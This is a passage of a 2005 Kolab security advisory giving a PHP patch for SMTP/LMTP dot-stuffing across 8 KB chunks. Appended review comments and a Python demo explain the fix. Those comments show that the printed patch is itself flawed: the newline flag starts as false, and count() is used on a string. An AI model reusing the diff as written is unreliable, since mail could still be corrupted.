patch -i kolabmailtransport.diff /kolab/var/kolab/php/kolabfilter/kolabmailtransport.php

You can also get the patch from issue1042 of Kolab's tracker.

9bdd3f3e4964eb8e6099db8b22b8c238 kolabmailtransport.diff

+=== cut here ==== |diff -u -p -r1.3.2.1 kolabmailtransport.php |--- kolabmailtransport.php 28 Jul 2005 02:20:36 -0000 1.3.2.1 |+++ kolabmailtransport.php 22 Dec 2005 17:44:38 -0000 |@@ -32,6 +32,7 @@ class KolabMailTransport { | function start($sender,$recips) { | $this->createTransport(); | $myclass = get_class($this->transport); |+ $this->got_newline = false; | | if (!$this->transport) { | return new PEAR_Error('Failed to connect to $myclass: ' . $error->getMessage(), 421); |@@ -99,8 +100,10 @@ class KolabMailTransport { | * Because a single leading period (.) signifies an end to the data, | * legitimate leading periods need to be "doubled" (e.g. '..'). | */ |- if( $data[0] == '.'
) $data = '.'.$data; |+ if( $this->got_newline && $data[0] == '.' ) $data = '.'.$data; | $data = str_replace("\n.", "\n..", $data); |+ if( $data[count($data)] == "\n" ) $this->got_newline = true; |+ else $this->got_newline = false; | } | | function data( $data) { |@@ -126,6 +129,7 @@ class KolabMailTransport { | var $host; | var $port; | var $transport; |+ var $got_newline; | }; | | class KolabLMTP extends KolabMailTransport { +=== cut here ====

Timeline
- --------

20051222 Bug report came in. Reproduced and fixed the bug. Advisory published.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD4DBQFDqvxZh9ag3dpKERYRAnilAKDP4ysnWU3pi4WLMaGfD8J6SspOfACYnniX
OV/nQeosx/b9SJZWb5TSKw==
=i8mz
-----END PGP SIGNATURE-----

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://kolab.org/pipermail/kolab-announce/attachments/20051222/3c53e06b/attachment.bin
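Review bot: in the first hunk (`@@ -32,6 +32,7 @@`), initialising `$this->got_newline = false;` in start() means a "." at the very start of the first chunk is never doubled, because the new guard `$this->got_newline && $data[0] == '.'` is false for that chunk; the DATA body begins at a line boundary, so the flag should start as true, which also preserves what the removed unconditional `if( $data[0] == '.' )` did for the first chunk.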
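Review bot: in the second hunk (`@@ -99,8 +100,10 @@`), the added line `|+ if( $data[count($data)] == "\n" ) $this->got_newline = true;` does not test the last byte of the chunk: `$data` is a string, and in PHP count() on a string returns 1 (a warning from 7.2 and a TypeError on PHP 8), so this reads `$data[1]` and got_newline is set from the second character rather than the trailing one; use `substr($data, -1) == "\n"` or `$data[strlen($data) - 1] == "\n"`, otherwise a chunk that ends in a newline is not recognised and a legitimate leading "." in the next chunk goes out single and is eaten by the receiver.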
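As an added example (not part of the advisory and not Kolab's kolabfilter code), the Python below shows why the Summary's size threshold matters: dot-stuffing decided per chunk, as the removed `if( $data[0] == '.' )` line did, doubles any "." that merely lands at a chunk boundary in the middle of a line, while a stuffer that remembers whether the previous chunk ended in a newline, which is what the patch's got_newline flag is for, leaves the delivered mail intact. The 8192-byte chunk size, the sample bodies and the helper names are constructed for this example.

```python
from typing import Callable

# Transport chunk size; 8192 is an assumption for this example (the advisory
# only says "bigger than 8 KByte").
CHUNK = 8192


def stuff_naive(chunk: str) -> str:
    """Dot-stuff one chunk with no memory of the previous one.

    Mirrors the pre-patch logic: a chunk whose first byte is "." is always
    doubled, even when that "." sits in the middle of a line of the full
    message (a base64 or clear-signed line straddling the chunk boundary).
    """
    if chunk.startswith("."):
        chunk = "." + chunk
    return chunk.replace("\n.", "\n..")


class DotStuffer:
    """Dot-stuff a stream of chunks, carrying line-boundary state across them."""

    def __init__(self) -> None:
        # The DATA body starts at a line boundary, so a leading "." in the
        # very first chunk must be doubled as well.
        self.at_line_start = True

    def feed(self, chunk: str) -> str:
        if not chunk:
            return chunk
        out = chunk.replace("\n.", "\n..")            # line-start dots inside the chunk
        if self.at_line_start and chunk.startswith("."):
            out = "." + out                           # line-start dot split by the boundary
        self.at_line_start = chunk.endswith("\n")     # remember how this chunk ended
        return out


def send_chunked(body: str, stuff: Callable[[str], str], size: int = CHUNK) -> str:
    """Split body into size-byte chunks, stuff each one, return the wire form."""
    return "".join(stuff(body[i:i + size]) for i in range(0, len(body), size))


def receive(wire: str) -> str:
    """What a conforming SMTP/LMTP receiver does: drop one leading "." per line."""
    return "\n".join(l[1:] if l.startswith(".") else l for l in wire.split("\n"))


def boundary_dot_body(size: int) -> str:
    """Constructed body whose byte at index `size` is a "." in mid-line."""
    return "A" * size + ".tail\n"


def delivered(body: str, stuff: Callable[[str], str], size: int) -> str:
    """Body as the receiver would store it after chunked sending with `stuff`."""
    return receive(send_chunked(body, stuff, size))


if __name__ == "__main__":
    body = boundary_dot_body(CHUNK)
    print("naive stuffer keeps body intact:   ", delivered(body, stuff_naive, CHUNK) == body)
    print("stateful stuffer keeps body intact:", delivered(body, DotStuffer().feed, CHUNK) == body)
```

The stateful version checks the last character of each chunk, which is the value the patch intends to capture in got_newline; a legitimate line that starts with "." immediately after a chunk ending in a newline is still doubled on the wire and restored by the receiver.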